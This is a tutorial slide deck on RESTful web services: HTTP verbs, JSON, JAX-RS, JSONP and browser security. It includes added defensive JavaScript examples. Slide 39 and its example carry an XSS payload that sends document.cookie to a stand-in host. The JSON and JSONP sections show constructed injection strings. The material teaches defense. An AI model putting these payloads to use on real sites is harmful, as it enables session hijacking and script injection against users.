1 Restful Web Services
By Loukik Purohit & Rohit Ghatol

2 Web Service: a service such as CricInfo exchanges messages (XML/JSON) with browser, desktop and mobile clients

3 Using a browser (user intervention): the user of the vacation subsystem books the cab, the plane and the hotel separately, by hand

4 Automated, machines interacting with each other: the vacation subsystem itself calls the cab booking, plane booking and hotel booking services and notifies the user (SMS/ )

5 REST in layman's terms: an organisation with HR, Accounts and Admin departments

6 Organised structure: to get the address of user 1, go to \Organisation\Users\1\address

7 The same analogy applies to the Web: a request to get all users (/users), a request to get user 1 (/users/1), a request to get the address of user 1 (/users/1/address)

8 Request-Response: GET
GET Request
GET /users HTTP/1.1
Host: xyz.com
Accept: application/xml

GET Response
<users>
  <user>
    <id>1</id>
    <name>Loukik</name>
    <address>Pune</address>
    <skill>java</skill>
  </user>
  <user>
    <id>2</id>
    <name>...</name>
    <address>...</address>
    <skill>...</skill>
  </user>
</users>

9 Request-Response: POST
POST Request
POST /users HTTP/1.1
Host: xyz.com
Content-Type: application/xml
Accept: application/xml

<user>
  <name>Rohit</name>
  <address>Pune</address>
  <skill>C++</skill>
</user>

POST Response
<result>
  <id>3</id>
</result>

10 HTTP
URL: http://xyz.com/services/users
HTTP Headers
Method: PUT
Accept: application/xml
Content-Type: application/xml
HTTP Body
<user>
  <name>Rohit</name>
  <address>Pune</address>
  <skill>C++</skill>
</user>

11 Four verbs for every noun
GET (read), POST (create), PUT (replace/update), DELETE (remove)
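The following is an added example, not code from the slides: the four verbs applied to one noun ("users"), in JavaScript with JSON messages rather than the slides' Java servlet and XML. The resource logic is a function that returns a status and body so it can be driven directly or from a Node http server; the two seed users and the host xyz.com are assumed. The security point it adds is that the representation the client sends is whitelisted, so a client cannot choose its own id or smuggle extra fields.

```javascript
// Added example (not from the slides): four HTTP verbs on one noun, "users".
// handle(method, path, body) returns { status, body }; seed data is assumed.

const users = new Map([
  [1, { id: 1, name: "Loukik", address: "Pune", skill: "java" }],
  [2, { id: 2, name: "Rohit", address: "Pune", skill: "C++" }],
]);
let nextId = 3;

// Whitelist the representation: only known string fields, bounded length,
// and never a client-chosen id (the server assigns ids).
function validateUser(body) {
  if (!body || typeof body !== "object") return null;
  const { name, address, skill } = body;
  const bad = [name, address, skill].some(
    (v) => typeof v !== "string" || v.length === 0 || v.length > 200
  );
  return bad ? null : { name, address, skill };
}

function handle(method, path, body) {
  const m = path.match(/^\/users(?:\/(\d+))?$/);
  if (!m) return { status: 404, body: { error: "no such resource" } };
  const id = m[1] === undefined ? null : Number(m[1]);

  if (method === "GET" && id === null) {                // all users
    return { status: 200, body: { users: [...users.values()] } };
  }
  if (method === "GET") {                               // one user
    const u = users.get(id);
    return u ? { status: 200, body: u } : { status: 404, body: { error: "no such user" } };
  }
  if (method === "POST" && id === null) {               // create
    const u = validateUser(body);
    if (!u) return { status: 400, body: { error: "invalid user" } };
    u.id = nextId++;
    users.set(u.id, u);
    return { status: 201, body: { id: u.id } };         // the JSON form of <result><id>3</id></result>
  }
  if (method === "PUT" && id !== null) {                // replace
    const u = validateUser(body);
    if (!u) return { status: 400, body: { error: "invalid user" } };
    if (!users.has(id)) return { status: 404, body: { error: "no such user" } };
    u.id = id;
    users.set(id, u);
    return { status: 200, body: u };
  }
  if (method === "DELETE" && id !== null) {             // remove
    return users.delete(id)
      ? { status: 204, body: null }
      : { status: 404, body: { error: "no such user" } };
  }
  return { status: 405, body: { error: "method not allowed" } };
}

// The exchange of slide 9 in JSON: POST /users creates user 3. The client's
// "id": 99 is ignored because validateUser never copies it.
const created = handle("POST", "/users", { name: "Rohit", address: "Pune", skill: "C++", id: 99 });
```

Wiring this to a real server is only a matter of reading `req.method`, `req.url` and a JSON-parsed body and writing `status` and `JSON.stringify(body)` back; the access-control decisions (which verbs a resource accepts, what the client may set) all live in `handle`.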

12 JSON. Can data be represented as lists and maps? Here's JSON. The classic one-liner for turning JSON text into an object was
var myObject = eval('(' + myJSONtext + ')');
This executes the text as JavaScript, so anything you did not generate yourself should go through JSON.parse(myJSONtext) instead.

13 JSON Parser

14 How JSON looks
var result = {
  "users": [
    { "id": "1", "name": "loukik", "address": "Pune", "skill": "java" },
    { "id": "2", "name": "rohit", "skill": "C++" }
  ]
};
Accessing JSON in JavaScript code: result.users[0].name evaluates to "loukik"
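The following is an added example, not from the slides, putting the eval() one-liner of slide 12 next to JSON.parse. Both inputs are constructed: the first is the JSON of slide 14, the second is JavaScript dressed up as JSON, the kind of thing a hostile or tampered service could return to a client that evaluates responses as code.

```javascript
// Added example (not from the slides): eval-based parsing versus JSON.parse.
// Both texts are constructed; the second contains an executable expression.

const goodText =
  '{"users":[{"id":"1","name":"loukik","address":"Pune","skill":"java"}]}';
const evilText =
  '{"users":[],"x":(function(){ globalThis.pwned = true; return 1; })()}';

globalThis.pwned = false;   // set to true only if the "payload" actually runs

// Slide 12: the parentheses make the text parse as an expression and eval
// runs it. Any JavaScript hidden in the "JSON" runs with the page's privileges.
function parseWithEval(text) {
  return eval("(" + text + ")");
}

// JSON.parse implements only the JSON grammar; a function call is a syntax
// error, so the hostile text is rejected rather than executed.
function parseJson(text) {
  try {
    return JSON.parse(text);
  } catch (err) {
    return null;                      // caller treats this as a malformed message
  }
}

// Slide 14: once parsed, fields are reached with plain property access.
function firstUserName(text) {
  const result = parseJson(text);
  return result && Array.isArray(result.users) && result.users.length > 0
    ? result.users[0].name
    : null;
}
```

Run as a whole, `parseJson(evilText)` returns null and leaves `globalThis.pwned` false, while `parseWithEval(evilText)` returns an object whose `x` is 1 and flips the flag: the difference between parsing data and running code.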

15 REST

16 Programmable Web: your source to 3000+ Web Service APIs

17 programmableweb.com

18 Implement a RESTful web service (the hard way)
Write a Servlet; implement doGet, doPost, doPut, doDelete; write the business logic; create your messages, in JSON

19 JAX-RS to the rescue: instead of marrying your API to EJB or the Servlet API, your resource class stays a plain POJO. Being single is great!

20 JAX-RS JSR 311: JAX-RS More info at

21 JAX-RS flow: HTTP request (JSON) -> POJO model (JAXB, @XmlRootElement) -> JAX-RS servlet -> business logic -> POJO model -> JSON -> HTTP response

22 Spring REST Based on Spring MVC

23 Spring REST: negotiated view-based rendering; HTTP message converters

24 Enunciate: attaches to your Web service API and produces full HTML documentation plus client-side libraries

25 What does Enunciate do for me? Your JAX-RS / SOAP POJOs go in; out come JavaDoc-style documentation and client communication libraries for C, Objective-C, .Net, GWT, AMF, Java and JSON

26 Enunciate is an engine for dramatically enhancing your Java Web service API. It is primarily a build-time tool: develop your Web service API, then attach Enunciate to your build process.

27 Cross Site Scripting and the Same-Origin Policy. Example mashup: a page on http://geochirp.com wants to make Ajax calls to maps.google.com and twitter.com

28 Same-Origin Policy, imposed by the browser: restricts Ajax calls to other origins, and restricts access to an iframe's DOM (JavaScript on ABC.com cannot read the DOM of an iframe showing XYZ.com)

29 So how to do mashups? Use a proxy: http://geochirp.com/proxy fetches from maps.google.com and twitter.com on the server side, so the browser only ever talks to geochirp.com

30 So how to do mashups? Use JSONP: the page on http://geochirp.com makes JSONP calls directly to maps.google.com and twitter.com

31 What is JSONP? An AJAX call from a page on ABC.com to XYZ.com is not allowed by the browser, but including a static script hosted on XYZ.com (<script src="http://XYZ.com/some.js">) is allowed.

32 What is JSONP? The same holds for a dynamic script: JavaScript on ABC.com creates a <script> element pointing at XYZ.com, and the browser fetches and executes it. JSONP uses this to carry data across origins.

33 JSONP Explained
JSON (subject to the Same-Origin Policy):
{ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" }
JSONP (no such restriction, because it is loaded as a script):
myfunc({ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" });

34 JSONP Code Example

35
<html>
<head>
<script>
function myfunc(data) {
  table.update(data);   // table: the page's own helper that redraws the employee table
}
</script>
</head>
<body>
<table>
  <!-- employee table -->
  <tr><td>Name</td><td>Address</td><td>Role</td></tr>
  <tr><td>Rohit</td><td>Pune</td><td>Architect</td></tr>
  <tr><td>Loukik</td><td>Pune</td><td>Geek</td></tr>
</table>
<button id="add-employee">Add</button>
<button id="next100">Next 100</button>
<script src="http://xyz.com/services/fetchemployees?page=1&jsonp=myfunc"></script>
</body>
</html>
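The following is an added example, not code from the slides: the server side of the JSONP endpoint that the page above requests with <script src="http://xyz.com/services/fetchemployees?page=1&jsonp=myfunc">, plus a stand-in for the browser executing the reply. It covers the mechanism of slides 31 to 35. Since a JSONP response is JavaScript, two things matter that the slides do not show: the callback name taken from the query string must be a plain identifier (otherwise ?jsonp=alert(1);// turns the endpoint into reflected script injection), and the data must be serialised so it cannot break out of the script. The employee records, the paging and the URL are assumed.

```javascript
// Added example (not from the slides): a JSONP endpoint with callback-name
// validation and safe serialisation, and a simulation of the browser running
// the reply. Employee data is constructed; the third record is hostile.

const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;   // plain identifier only
const PAGE_SIZE = 2;

const employees = [
  { name: "Rohit", address: "Pune", role: "Architect" },
  { name: "Loukik", address: "Pune", role: "Geek" },
  { name: "</script><script>alert(1)</script>", address: "-", role: "tester" },
];

function jsonpResponse(callbackName, data) {
  if (!CALLBACK_RE.test(callbackName)) {
    throw new Error("invalid JSONP callback name");
  }
  // JSON.stringify output is valid JavaScript. Additionally escape "<" so a
  // literal </script> in the data cannot close the including <script>
  // element, and U+2028/2029, which older engines treat as line terminators
  // even inside string literals.
  const js = JSON.stringify(data)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return `/**/${callbackName}(${js});`;
}

// Handles a request URL such as /services/fetchemployees?page=1&jsonp=myfunc
function handleJsonpRequest(requestUrl) {
  const url = new URL(requestUrl, "http://xyz.com");
  const cb = url.searchParams.get("jsonp");
  const page = Number(url.searchParams.get("page") || "1");
  if (cb === null || !CALLBACK_RE.test(cb) || !Number.isInteger(page) || page < 1) {
    return { status: 400, contentType: "text/plain", body: "bad request" };
  }
  const slice = employees.slice((page - 1) * PAGE_SIZE, page * PAGE_SIZE);
  return {
    status: 200,
    contentType: "application/javascript",
    body: jsonpResponse(cb, { page, employees: slice }),
  };
}

// What the browser does with the reply: execute it as a script in the
// including page, where the named callback is a global. The callbacks object
// stands in for that global scope.
function runAsScript(scriptBody, callbacks) {
  const names = Object.keys(callbacks);
  const fn = new Function(...names, scriptBody);
  return fn(...names.map((n) => callbacks[n]));
}
```

Note what runAsScript makes explicit: the including page hands XYZ.com full script execution in its own origin, so JSONP is only as safe as the service you include. Browsers later added CORS precisely so that an Ajax call to another origin can be permitted by that origin without handing it script execution.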

36 XSS: the attacker posts <script> attack script </script> to the ScrapBook website; a user logs in and views the page, and the script runs in that user's session. Hacked!!!

38 How to do XSS? The server needs an XSS vulnerability. Say the developer renders a posted scrap with div.innerHTML:
function postScrap(){ div.innerHTML = textarea.value; }
What if I put HTML with some JavaScript in the textarea and press Post?

39 How to do XSS? The server needs an XSS vulnerability. With
function postScrap(){ div.innerHTML = textarea.value; }
the attacker posts something like
<h1>Look at this cool image</h1>
<img src="x" onerror="(new Image).src='http://hack.com/?cookie='+encodeURIComponent(document.cookie)">
and every user who views the scrap has their cookie sent to hack.com. A <script> element inserted through innerHTML is not executed, which is why the payload uses an event-handler attribute on an image whose load fails.
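The following is an added example, not code from the slides: the innerHTML rendering of slide 38 beside a hardened version. Outside a browser there is no DOM, so both versions are written as functions returning the markup they would assign; in the page itself the fix is div.textContent = textarea.value, or escaping before innerHTML. The payload follows slide 39; hack.com is the slides' illustration, not a real target.

```javascript
// Added example (not from the slides): vulnerable versus hardened rendering of
// user-posted text. The payload is the slides' illustration.

const payload =
  "<h1>Look at this cool image</h1>" +
  "<img src=\"x\" onerror=\"(new Image).src='http://hack.com/?cookie='+encodeURIComponent(document.cookie)\">";

// Vulnerable (slide 38): the posted text is handed to the HTML parser as-is.
// A <script> tag inserted via innerHTML does not run, but the onerror handler
// fires as soon as the broken image fails to load, in ScrapBook's origin,
// with access to document.cookie.
function renderScrapUnsafe(text) {
  return text;                               // div.innerHTML = textarea.value
}

// Encode the five HTML metacharacters so user text is displayed, not parsed.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same characters are shown on screen, but no tag reaches the
// parser, so no attribute can carry a handler.
function renderScrapSafe(text) {
  return escapeHtml(text);                   // equivalently: div.textContent = text
}

// Crude check used in the usage below: does the rendered markup still
// contain an HTML tag?
function containsTags(html) {
  return /<[a-z!/][^>]*>/i.test(html);
}
```

Marking the session cookie HttpOnly would stop this particular exfiltration of document.cookie but not the script from running; output encoding (or textContent) removes the vulnerability itself.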

40 XSRF: Cross-Site Request Forgery.
Unauthorized commands are transmitted from a user that the website trusts. It exploits the trust that a site has in a user's browser: the browser attaches the session cookie to every request to that site, whichever page triggered it.

41 XSRF: the user logs into the ScrapBook website, then opens a mail sent by the attacker. The mail page contains a script (or a form or image request) that sends a request to ScrapBook, and the browser attaches the user's session to it. Hacked!!!

42 How to do XSRF: is it possible? The browser holds your sessions. What if I made you visit a page which uses your session to do the hack?

43 Aye Mate! How come I can use Google+ and Facebook Like here?

